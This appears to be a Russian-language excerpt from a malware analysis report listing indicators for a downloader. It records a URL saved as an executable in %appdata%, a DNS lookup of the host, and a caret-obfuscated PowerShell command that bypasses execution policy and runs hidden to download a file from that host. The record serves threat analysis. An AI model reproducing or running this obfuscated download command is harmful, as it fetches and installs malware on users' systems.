Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWEr^S^heLl.ex^E -E^X^Ec^UT^i^OnpoLIcy^ bYpasS ^-N^oPRofiL^E -W^iNd^owstY^le^ hiDde^N^ (new-Ob^Je^CT^ s^y^S^t^EM.NEt^.WEb^C^LIENT).dowNL^oA^d^fIle^('http://flowers-my.wang/search...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "poWEr^S^heLl.ex^E -E^X^Ec^UT^i^OnpoLIcy^ bYpasS ^-N^oPRofiL^E -W^iNd^owstY^le^ hiDde^N^ (new-Ob^Je^CT^ s^y^S^t^EM.NEt^.WEb^C^LIENT).dowNL^oA^d^fIle^('http://flowers-my.wang/search...' (со скрытым окном)